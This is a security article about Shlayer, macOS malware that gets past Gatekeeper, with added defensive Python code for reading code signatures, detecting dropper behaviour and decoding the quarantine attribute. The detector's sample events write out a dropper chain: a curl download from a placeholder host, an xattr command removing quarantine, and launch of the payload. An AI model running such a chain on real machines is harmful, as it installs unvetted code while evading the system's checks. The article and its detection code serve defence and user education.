New Mac Malware Bypasses Gatekeeper Security

Macs have long had a reputation for being harder to infect than Windows PCs, and Apple’s Gatekeeper feature is a large part of the reason: by default it only lets users open apps that come from the Mac App Store or from developers Apple has identified. Newly analyzed malware, however, is able to slip past Gatekeeper entirely.

How Gatekeeper Works

Gatekeeper uses developer code signing to verify that an app was built by a developer Apple knows about and has not been altered since it was signed. By default, it allows users to open apps from:

  • The Mac App Store
  • Identified developers (apps signed with an Apple-issued Developer ID certificate and, on macOS 10.15 and later, notarized by Apple)

Apps from unidentified developers are blocked by default, which keeps untrusted and potentially malicious apps from running. The check is triggered by the quarantine attribute that browsers and other downloaders attach to files, and a user can still override a block for an individual app, which is exactly what social-engineering droppers count on.

Gatekeeper has been an effective security layer for Macs, but it is not foolproof. The malware described below takes advantage of gaps in how Apple issues, revokes and checks developer certificates to get past Gatekeeper completely.
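The following is an added example (not code from the article or from Apple) showing what Gatekeeper actually looks at. It parses the output of the macOS tools codesign -dvv and spctl --assess -vv and reduces it to the trust tier Gatekeeper applies: Mac App Store, Developer ID (notarized or not), or blocked. The sample tool output is constructed to mirror the real format; the identifier, vendor name and team ID in it are invented, and the classify() tiers are my own labels.

```python
"""Summarise what Gatekeeper sees in an app bundle by parsing the output of
the macOS tools `codesign -dvv` and `spctl --assess -vv`.

Added example, not code from the original article. The sample tool output
below is constructed to mirror the real format (identifier, team ID and
vendor are invented); on a Mac, gatekeeper_summary() runs the real tools.
"""
import re
import subprocess
from dataclasses import dataclass, field


@dataclass
class SigningInfo:
    identifier: str = ""
    team_id: str = ""
    authorities: list = field(default_factory=list)  # certificate chain, leaf first
    timestamp: str = ""          # secure timestamp, if the signature carries one
    assessment: str = "unknown"  # "accepted" or "rejected", from spctl
    source: str = ""             # spctl's reason, e.g. "Notarized Developer ID"


def parse_codesign(text: str) -> SigningInfo:
    """codesign -dvv prints key=value lines (on stderr). Authority= repeats
    once per certificate in the chain, leaf first."""
    info = SigningInfo()
    for line in text.splitlines():
        key, sep, val = line.partition("=")
        if not sep:
            continue
        if key == "Identifier":
            info.identifier = val
        elif key == "TeamIdentifier":
            info.team_id = val
        elif key == "Authority":
            info.authorities.append(val)
        elif key == "Timestamp":
            info.timestamp = val
    return info


def parse_spctl(text: str, info: SigningInfo) -> SigningInfo:
    """spctl --assess -vv prints '<path>: accepted|rejected' and a source= line."""
    for line in text.splitlines():
        m = re.match(r"^.*: (accepted|rejected)\b", line)
        if m:
            info.assessment = m.group(1)
        elif line.startswith("source="):
            info.source = line[len("source="):]
    return info


def leaf_team_id(info: SigningInfo) -> str:
    """Team ID embedded in the leaf certificate name, e.g.
    'Developer ID Application: Example Corp (ABCDE12345)' -> 'ABCDE12345'."""
    if not info.authorities:
        return ""
    m = re.search(r"\(([A-Z0-9]{10})\)\s*$", info.authorities[0])
    return m.group(1) if m else ""


def classify(info: SigningInfo) -> str:
    """Reduce the raw fields to the trust tier Gatekeeper applies."""
    if info.assessment == "rejected":
        return "blocked"
    leaf = info.authorities[0] if info.authorities else ""
    if leaf.startswith("Apple Mac OS Application Signing"):
        return "mac-app-store"
    if leaf.startswith("Developer ID Application:"):
        if info.team_id and leaf_team_id(info) != info.team_id:
            return "developer-id-team-mismatch"  # inconsistent signature, look closer
        return "developer-id-notarized" if "Notarized" in info.source else "developer-id"
    return "unsigned-or-adhoc"


def gatekeeper_summary(app_path: str) -> SigningInfo:
    """macOS only: run the real tools. codesign reports on stderr; spctl's
    verdict can land on either stream, so both are combined."""
    cs = subprocess.run(["codesign", "-dvv", app_path], capture_output=True, text=True)
    sp = subprocess.run(["spctl", "--assess", "--type", "execute", "-vv", app_path],
                        capture_output=True, text=True)
    return parse_spctl(sp.stdout + sp.stderr, parse_codesign(cs.stderr + cs.stdout))


# Constructed sample output in the format the tools print (values invented).
SAMPLE_CODESIGN = """\
Executable=/Applications/Example.app/Contents/MacOS/Example
Identifier=com.example.app
Format=app bundle with Mach-O universal (x86_64 arm64)
CodeDirectory v=20500 size=1234 flags=0x10000(runtime) hashes=30+7 location=embedded
Authority=Developer ID Application: Example Corp (ABCDE12345)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
Timestamp=1 Mar 2021 at 10:15:00
TeamIdentifier=ABCDE12345
"""
SAMPLE_SPCTL_ACCEPTED = (
    "/Applications/Example.app: accepted\n"
    "source=Notarized Developer ID\n"
    "origin=Developer ID Application: Example Corp (ABCDE12345)\n"
)
SAMPLE_SPCTL_REJECTED = "/Volumes/Install/Player.app: rejected\nsource=no usable signature\n"

if __name__ == "__main__":
    ok = parse_spctl(SAMPLE_SPCTL_ACCEPTED, parse_codesign(SAMPLE_CODESIGN))
    print(classify(ok), ok.team_id, ok.authorities[0])
    bad = parse_spctl(SAMPLE_SPCTL_REJECTED, SigningInfo())
    print(classify(bad), bad.source)
```

The point of reading the chain rather than trusting the single "accepted" line is that it shows who actually vouched for the code: a Developer ID leaf that is not notarized, or whose team ID does not match the TeamIdentifier the bundle claims, is exactly the kind of signature the malware discussed below hides behind.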

New Malware Slips Past Gatekeeper

Researchers at Red Canary have documented macOS malware that gets past Gatekeeper’s checks. The family, Shlayer, was first identified by Intego in 2018; its name refers to the layered shell scripts it is built from.

Shlayer first lands on a Mac through downloaders served from sites posing as legitimate download pages for popular software (fake Adobe Flash Player updates were its standard lure). The downloaders are signed with valid Developer ID certificates, so Gatekeeper lets them run.

From there Shlayer leans on two further weaknesses. Its stages are signed with Developer ID certificates issued in other developers’ names; Gatekeeper honors a signature that was made while the certificate was still valid even after that certificate expires, and it only learns of a revocation by querying Apple’s OCSP responder, so a stale certificate keeps looking legitimate to both the system and the user. Shlayer has also abused notarization, the pre-distribution scan Apple requires for Developer ID software: in 2020 researchers found Shlayer payloads that Apple’s notarization service had approved.

With these techniques Shlayer runs on Macs without tripping Gatekeeper, then installs adware and other malicious payloads.
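Because Shlayer’s signatures and notarization look legitimate, detection has to come from what it does on the host rather than from who signed it. The added example below (my own code, not Red Canary’s analytics or anything from the article) scores process events for the shell-script dropper tradecraft publicly documented for Shlayer: a shell launched from a mounted disk image that fetches a second stage with curl, strips the com.apple.quarantine attribute with xattr so Gatekeeper never assesses it, and then launches it. The event format, the sample events, the paths and URL, and the scoring threshold are all assumptions made for this illustration.

```python
"""Flag Shlayer-style dropper behaviour in process events: a shell launched
from a mounted disk image that downloads a second stage with curl, strips
the com.apple.quarantine attribute with xattr and then launches it.

Added example. The event format, the sample events and the scoring rule are
assumptions made for this illustration, not a vendor's detection analytics.
Paths, URL and names are invented.
"""
import shlex
from collections import defaultdict, namedtuple

Event = namedtuple("Event", "pid ppid image cmdline")

SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh"}


def _argv(ev):
    try:
        return shlex.split(ev.cmdline)
    except ValueError:
        return ev.cmdline.split()


def _basename(path):
    return path.rsplit("/", 1)[-1]


def strips_quarantine(argv):
    """xattr -d com.apple.quarantine <file>   or   xattr -c <file> (clear all)."""
    if not argv or _basename(argv[0]) != "xattr":
        return False
    return ("-d" in argv and "com.apple.quarantine" in argv) or "-c" in argv


def downloads_to_disk(argv):
    """curl writing the response body to a file (-o / -O / --output), i.e. a payload fetch."""
    if not argv or _basename(argv[0]) != "curl":
        return False
    for a in argv[1:]:
        if a in ("-o", "-O", "--output", "--remote-name"):
            return True
        if a.startswith("-") and not a.startswith("--") and ("o" in a[1:] or "O" in a[1:]):
            return True  # bundled short flags such as -fsLo
    return False


def detect(events):
    """Return (shell pid, sorted indicators) for each shell showing the dropper pattern."""
    by_pid = {ev.pid: ev for ev in events}
    children = defaultdict(list)
    for ev in events:
        children[ev.ppid].append(ev)

    findings = []
    for ev in events:
        if ev.image not in SHELLS:
            continue
        parent = by_pid.get(ev.ppid)
        hits = set()
        if "/Volumes/" in ev.cmdline or (parent and parent.image.startswith("/Volumes/")):
            hits.add("shell_from_disk_image")
        unquarantined = []
        for child in children[ev.pid]:
            argv = _argv(child)
            if downloads_to_disk(argv):
                hits.add("curl_download")
            if strips_quarantine(argv):
                hits.add("quarantine_removed")
                unquarantined.append(argv[-1])  # the file whose attribute was removed
        for child in children[ev.pid]:
            if any(child.image.startswith(p) for p in unquarantined):
                hits.add("launched_unquarantined_payload")
        # Removing quarantine is the tell; require one more indicator to cut noise
        # from developers who legitimately clear the attribute by hand.
        if "quarantine_removed" in hits and len(hits) >= 2:
            findings.append((ev.pid, sorted(hits)))
    return findings


# Constructed sample: an app on a mounted DMG spawns sh, which fetches a payload,
# strips quarantine from it and executes it. All paths and the URL are invented.
SAMPLE_EVENTS = [
    Event(501, 1,   "/Volumes/Install/Player.app/Contents/MacOS/Player",
          "/Volumes/Install/Player.app/Contents/MacOS/Player"),
    Event(502, 501, "/bin/sh", "/bin/sh -c /Volumes/Install/Player.app/Contents/Resources/enc"),
    Event(503, 502, "/usr/bin/curl", "curl -fsL -o /tmp/stage2.zip https://example.invalid/s2"),
    Event(504, 502, "/usr/bin/unzip", "unzip -o /tmp/stage2.zip -d /tmp/stage2"),
    Event(505, 502, "/usr/bin/xattr", "xattr -d com.apple.quarantine /tmp/stage2/Stage2.app"),
    Event(506, 502, "/tmp/stage2/Stage2.app/Contents/MacOS/Stage2",
          "/tmp/stage2/Stage2.app/Contents/MacOS/Stage2"),
]

# Constructed benign activity: a user inspecting attributes from Terminal.
BENIGN_EVENTS = [
    Event(601, 1,   "/Applications/Terminal.app/Contents/MacOS/Terminal", "Terminal"),
    Event(602, 601, "/bin/zsh", "-zsh"),
    Event(603, 602, "/usr/bin/xattr", "xattr -l /Users/demo/Downloads/report.pdf"),
]

if __name__ == "__main__":
    print(detect(SAMPLE_EVENTS))   # one finding for the sh process, pid 502
    print(detect(BENIGN_EVENTS))   # []
```

Feeding this real telemetry (an EDR process log or a log stream from an endpoint agent) is a matter of mapping its fields onto the Event tuple; the logic itself does not depend on a signature, which is the point when the signer is the part the attacker controls.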

“Shlayer shows that the trust model the Mac is based on is incomplete.” – Director of Mac and mobile, Red Canary

Revoked and Expired Developer Certificates Enable Bypass

A key factor allowing Shlayer to bypass Gatekeeper is its supply of Developer ID certificates: some obtained under false pretenses, some stolen, and some that should no longer be trusted at all.

Apple revokes Developer ID certificates once it finds them being used to sign malware, but revocation is reactive. Until Apple acts, and until a given Mac fetches fresh revocation information (Gatekeeper’s revocation check relies on Apple’s OCSP service, so a Mac that is offline cannot learn that a certificate was revoked), an abused certificate continues to pass, and a signature made before a certificate expired remains acceptable afterwards.

These stale certificates let malware authors make their apps look legitimate: the malware itself was never submitted to Apple, but the trusted signature gets it through Gatekeeper.

Patrick Wardle, a Mac security expert, recommends routinely checking for and distrusting expired certificates to shore up this weakness of Gatekeeper.

Apple Taking Steps to Improve Mac Security

While Shlayer has exposed flaws in Gatekeeper’s protections, Apple does appear to be taking steps to improve Mac security:

  • Developer ID certificates expire after a fixed term rather than being open-ended, which limits how long any one certificate can be abused.
  • Notarization: since macOS 10.15, Developer ID software carrying the quarantine attribute must have been scanned and approved by Apple before Gatekeeper will open it, and Apple can revoke a notarization ticket it later finds was granted to malware.
  • Clearer Gatekeeper warnings in newer versions of macOS when an app’s signature cannot be verified or the app is not notarized.
  • Faster revocation of abused certificates once they are detected.
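Since both notarization and Gatekeeper’s assessment hinge on the quarantine attribute, knowing how to read it is useful when triaging a suspicious download. The added example below (my own code, not from the article or from Apple) decodes the com.apple.quarantine value, whose format is flags;time;agent;uuid with the flags and the Unix timestamp written in hex, and reports when a file lacks the attribute altogether, the state a dropper leaves behind after xattr -d. The sample values are constructed and the agent names and UUID are invented.

```python
"""Decode the com.apple.quarantine extended attribute that macOS sets on
downloaded files. Its presence is what makes Gatekeeper assess an item the
first time it is opened (and, on macOS 10.15 and later, require notarization
for Developer ID code); a file that never received the attribute, or had it
stripped with `xattr -d`, is never assessed.

Added example, not code from the original article. The value format is
'flags;time;agent;uuid' with flags and the Unix time in hex; the sample
values are constructed and the agent names and UUID are invented.
"""
import subprocess
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Optional

ATTR = "com.apple.quarantine"


@dataclass
class Quarantine:
    flags: int
    downloaded_at: datetime  # UTC, from the hex timestamp field
    agent: str               # the app that saved the file, e.g. "Safari"
    uuid: str                # key into the LaunchServices quarantine event database; may be empty


def parse_quarantine(value: str) -> Quarantine:
    parts = value.strip().split(";")
    if len(parts) < 3:
        raise ValueError(f"unexpected quarantine value: {value!r}")
    flags = int(parts[0], 16)
    when = datetime.fromtimestamp(int(parts[1], 16), tz=timezone.utc)
    uuid = parts[3] if len(parts) > 3 else ""
    return Quarantine(flags, when, parts[2], uuid)


def read_quarantine(path: str) -> Optional[Quarantine]:
    """macOS only: returns None when the attribute is absent, which is what a
    dropper leaves behind after `xattr -d com.apple.quarantine <file>`, and
    also what you get for files fetched with curl, which never sets it."""
    r = subprocess.run(["xattr", "-p", ATTR, path], capture_output=True, text=True)
    if r.returncode != 0 or not r.stdout.strip():
        return None
    return parse_quarantine(r.stdout)


def describe(q: Optional[Quarantine]) -> str:
    """One-line triage summary for an analyst."""
    if q is None:
        return "no quarantine attribute: Gatekeeper will not assess this file"
    return (f"downloaded {q.downloaded_at:%Y-%m-%d %H:%M:%S} UTC by {q.agent}"
            f" (flags 0x{q.flags:04x}, uuid {q.uuid or '-'})")


# Constructed sample values in the format macOS writes (agents/UUID invented).
SAMPLE_SAFARI = "0083;5fa4b3c2;Safari;2F6A0D2B-5C1E-4B8F-9A3D-7E0C1B2A3F45"
SAMPLE_NO_UUID = "0081;5fa4b3c2;Chrome;"

if __name__ == "__main__":
    print(describe(parse_quarantine(SAMPLE_SAFARI)))
    print(describe(parse_quarantine(SAMPLE_NO_UUID)))
    print(describe(None))
```

On a Mac, read_quarantine("/path/to/download.dmg") wraps the xattr call; a freshly downloaded installer with no attribute at all, or an attribute whose agent is a shell rather than a browser, is worth a second look before the app is opened.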

However, the existence of malware like Shlayer shows that serious security holes remain. Mac users should not assume they are invulnerable to malware. Practicing safe browsing and computing habits remains essential.

How Mac Users Can Protect Themselves

Here are some best practices Mac users should follow to reduce malware risks:

  • Only install apps from trustworthy sources such as the Mac App Store or the developer’s own download page.
  • Use anti-malware software to detect threats.
  • Turn off Safari’s “Open ‘safe’ files after downloading” option so that downloaded disk images are not mounted automatically, and be wary of any site that pushes an installer at you.
  • Keep your Mac up to date with the latest OS updates, which also deliver Apple’s built-in malware signatures.
  • Don’t override a Gatekeeper block (right-click and Open, or “Open Anyway” in Security & Privacy) without verifying the app’s legitimacy.
  • Watch for signs of adware or malware: unexpected browser extensions, a changed search engine or home page, or new launch agents.

Following these precautions will help protect Macs against emerging malware threats aimed at bypassing Gatekeeper and other Apple defenses.

The discovery of Shlayer shows Macs are being actively targeted by malware developers. However, by understanding the techniques used and taking appropriate precautions, Mac users can still enjoy a high level of security and privacy.
